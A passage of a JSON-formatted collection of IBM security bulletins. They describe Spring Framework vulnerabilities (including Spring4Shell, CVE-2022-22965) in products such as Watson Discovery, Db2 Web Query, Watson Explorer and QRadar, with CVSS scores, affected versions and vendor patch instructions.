6.0.3.7, 6.1.0.6, 6.1.1.2 or 6.1.2.0 \nIBM Sterling B2B Integrator| 6.1.0.0 - 6.1.0.5 \n\n6.1.1.0 - 6.1.1.1\n\n| \n\nIT41291\n\n| Apply 6.1.0.6, 6.1.1.2 or 6.1.2.0 \n \nThe version 6.0.3.7 , 6.1.0.6 and 6.1.1.2 are available on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>). The IIM version of 6.1.2.0 is available in IBM Passport Advantage. The container version of 6.1.2.0 is available in IBM Entitled Registry with following tags. \n\ncp.icr.io/cp/ibm-b2bi/b2bi:6.1.2.0 for IBM Sterling B2B Integrator \ncp.icr.io/cp/ibm-sfg/sfg:6.1.2.0 for IBM Sterling File Gateway\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-14T21:50:51", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator vulnerable due to Spring Framework (CVE-2021-22096, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22096", "CVE-2022-22950"], "modified": "2022-10-14T21:50:51", "id": "CE1EA8BD930C36AD90F7CB9A4D45A1E00F086D40B88449DF5CAD4F426F6C3DF7", "href": "https://www.ibm.com/support/pages/node/6829591", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-06-07T21:56:59", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:55:20", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework (CVE-2022-22968, CVE-2022-22965, and CVE-2022-22950) as described in the vulnerability details section. Spring Framework v5.3.8 is used by Db2 Web Query for i for infrastructure support. IBM has addressed the vulnerabilities in Db2 Web Query for i by upgrading to Spring Framework v5.3.19. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Db2 Web Query for i| 2.3.0 \nIBM Db2 Web Query for i| 2.2.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nDb2 Web Query for i releases 2.2.1 and 2.3.0 are impacted. \n\n**Release 2.2.1 can be fixed by upgrading to release 2.3.0.**\n\nTo request an EZ-Install package, including instructions for the upgrade installation, send an email to [QU2@us.ibm.com](<mailto:QU2@us.ibm.com>). More information for the upgrade is available at <https://ibm.biz/db2wq-install>. \n\n**Release 2.3.0 can be fixed by applying the latest Db2 Web Query for i group Program Temporary Fix (PTF).**\n\nThe PTFs are applied to product ID 5733WQX. The group PTF numbers and minimum level with the fix are:\n\n**Affected Releases**\n\n| \n\n**Group PTF and Minimum Level for Remediation** \n \n---|--- \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.5\n\n| \n\n[SF99671 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99671&includeSupersedes=0&source=fc> \"SF99671 level 6\" ) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.4\n\n| \n\n[SF99654 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99654&includeSupersedes=0&source=fc>) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.3\n\n| \n\n[SF99533 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99533&includeSupersedes=0&source=fc>) \n \n_**Important note:** \n__IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T05:17:19", "type": "ibm", "title": "Security Bulletin: Due to use of Spring Framework, IBM Db2 Web Query for i is vulnerable to unprotected fields (CVE-2022-22968), remote code execution (CVE-2022-22965), and denial of service (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-06-10T05:17:19", "id": "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "href": "https://www.ibm.com/support/pages/node/6593861", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:57:33", "description": "## Summary\n\nSecurity vulnerability in Spring Framework affects IBM Watson Explorer. IBM Watson Explorer has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Foundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \n \n## Remediation/Fixes\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition \nFoundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9\n\n| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/12.0.x?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539806>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEFoundational-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539808>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/11.0.2?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539814>)).\n 2. Download the interim fix for your edition (Enterprise or Advanced) from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.11&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-<Edition>Foundational-IF001 **(EE for Enterprise Edition, AE for Advanced Edition).\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<http://www.ibm.com/support/pages/node/6497905>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.13&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-AEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T11:43:07", "type": "ibm", "title": "Security Bulletin: Vulnerability exists for Spring Framework in Watson Explorer (CVE-2021-22060, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-04-22T11:43:07", "id": "F426BDEEA0109CBE44C73C53461CE7144BDD04ADCF7EC044CE76723EAE672095", "href": "https://www.ibm.com/support/pages/node/6573715", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:54:44", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. QVM utilizes the Spring Framework to support our Java backed user interface.. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:56:32", "description": "## Summary\n\nVulnerabilities in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (CVE-2022-22950, CVE-2021-22096, CVE-2022-22968, CVE-2021-22060).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: 